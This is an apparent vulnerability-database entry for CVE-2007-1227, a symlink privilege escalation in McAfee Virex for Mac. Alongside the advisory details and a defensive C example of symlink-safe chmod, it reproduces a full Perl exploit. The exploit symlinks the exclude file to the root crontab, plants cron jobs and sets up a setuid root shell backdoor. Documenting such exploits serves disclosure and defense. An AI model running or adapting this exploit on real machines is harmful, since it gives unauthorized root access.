McAfee VirusScan /Library/Application Permissions and Access Control Vulnerability

Vulnerability ID: 1112329 | Vulnerability type: Permissions and access control
Published: 2007-02-28 | Updated: 2007-03-02
CVE ID: CVE-2007-1227 | CNNVD-ID: CNNVD-200703-090
Platform: OSX | CVSS score: 6.6
|Vulnerability Source
https://www.exploit-db.com/exploits/3386
https://www.securityfocus.com/bid/81884
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200703-090
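|Vulnerability Details
VShieldCheck in McAfee VirusScan for Mac (Virex) before 7.7 patch 1 allows local users to change the permissions of arbitrary files via a symlink attack on /Library/Application Support/Virex/VShieldExclude.txt, for example to execute arbitrary commands via a symlink attack on the root crontab file.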
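A privileged process that changes permissions on a path a local user can replace with a symlink, as described above, is normally hardened by opening the file without following links and then working on the descriptor. The C code below is an added example, not McAfee's code and not part of the original advisory; `safe_chmod` and `demo` are hypothetical names and the scratch files are constructed for the demonstration.

```c
#define _XOPEN_SOURCE 700
#include <fcntl.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper, not McAfee code: set `mode` on `path` only if it is a
 * regular, singly linked file owned by `owner`. Returns 0, or -1 on refusal. */
int safe_chmod(const char *path, mode_t mode, uid_t owner)
{
    struct stat st;
    int rc = -1;
    /* O_NOFOLLOW: open() fails if the last path component is a symlink.
     * O_NONBLOCK: a FIFO planted at the path cannot block the caller. */
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_NONBLOCK);
    if (fd < 0)
        return -1;
    /* fstat()/fchmod() act on the opened object, not on the name, so swapping
     * the path for a link after the checks cannot redirect the change. */
    if (fstat(fd, &st) == 0 && S_ISREG(st.st_mode) && st.st_nlink == 1 &&
        st.st_uid == owner && fchmod(fd, mode) == 0)
        rc = 0;
    close(fd);
    return rc;
}

/* Constructed scenario: "list" is a symlink planted where a data file is
 * expected, "target" is the file it points at. Returns 0 if the link is
 * refused, "target" keeps mode 0600, and a genuine file is still accepted. */
int demo(void)
{
    char dir[] = "/tmp/symdemoXXXXXX";
    struct stat st;
    if (!mkdtemp(dir) || chdir(dir) != 0)
        return -1;
    close(open("target", O_CREAT | O_WRONLY, 0600));
    close(open("real", O_CREAT | O_WRONLY, 0600));
    if (chmod("target", 0600) != 0 || symlink("target", "list") != 0)
        return -1;
    int refused = safe_chmod("list", 0666, geteuid()) == -1;
    int accepted = safe_chmod("real", 0644, geteuid()) == 0;
    if (stat("target", &st) != 0)
        return -1;
    return (refused && accepted && (st.st_mode & 0777) == 0600) ? 0 : 1;
}

int main(void) { return demo(); }
```

`O_NOFOLLOW` only covers the final path component, so the directory holding the file must also not be writable by unprivileged users.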
|Exploit
#!/usr/bin/perl
#
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com)
#
# Following symlinks is bad mmmmmmmmmmkay!
#

$dest = "/var/cron/tabs/root";

$tgts{"0"} = "Virex 7.7.dmg:\"/Library/Application
Support/Virex/VShieldExclude.txt\"  ";

unless (($target) = @ARGV) {
       print "\n\nUsage: $0 <target> \n\nTargets:\n\n";

       foreach $key (sort(keys %tgts)) {
               ($a,$b) = split(/\:/,$tgts{"$key"});
               print "\t$key . $a\n";
       }

       print "\n";
       exit 1;
}

($a,$b) = split(/\:/,$tgts{"$target"});
print "*** Target: $a $b\n";

# Set aside a backdoor that we will chmod and chown later
open(BD,">/tmp/pwnrex.c");
printf BD "main()\n";
printf BD "{ seteuid(0); setegid(0); setuid(0); setgid(0);
system(\"/bin/sh -i\"); }\n";
#system("gcc -o /Users/Shared/shX /tmp/pwnrex.c");
system("cp /usr/bin/id  /Users/Shared/shX");  # this is for those without gcc.

# set aside root crontab dropper
open(PH,">/Users/Shared/droptab.pl");
print PH "system\(\"echo \'* * * * * /usr/sbin/chown root: /Users/Shared/shX; /bin/chmod 4755 /Users/Shared/shX\' > /var/cron/tabs/root\"\)\;\n";

# rm the existing log file and symlink it to the root crontab file. A reboot will be required to exploit this.
system("rm -rf $b; ln -s $dest $b");

# start up a crontab request that will be *VERY* useful after the machine has rebooted.
system("echo '* * * * * /usr/bin/perl /Users/Shared/droptab.pl; sleep 90; crontab /Users/Shared/xxx' > /tmp/user_cron");
system("echo '* * * * * /usr/bin/id' >  /Users/Shared/xxx");
system("crontab /tmp/user_cron");

print "wait for a reboot and a cron run...\n"

# milw0rm.com [2007-02-28]
|Affected Products
McAfee Virex 7.7 - Mac
McAfee Virex 6.2 - Mac
|References

Source: XF
Name: mcafee-virex-library-privilege-escalation(32729)
Link: http://xforce.iss.net/xforce/xfdb/32729
Source: SECTRACK
Name: 1017707
Link: http://www.securitytracker.com/id?1017707
Source: BID
Name: 22744
Link: http://www.securityfocus.com/bid/22744
Source: BUGTRAQ
Name: 20070227 [NETRAGARD-20070220 SECURITY ADVISORY] [McAfee VirusScan for Mac (Virex) Local root exploit and Scan Bypass]
Link: http://www.securityfocus.com/archive/1/archive/1/461485/100/0/threaded
Source: VUPEN
Name: ADV-2007-0777
Link: http://www.frsirt.com/english/advisories/2007/0777
Source: SREASON
Name: 2342
Link: http://securityreason.com/securityalert/2342
Source: SECUNIA
Name: 24337
Link: http://secunia.com/advisories/24337
Source: OSVDB
Name: 33797
Link: http://osvdb.org/33797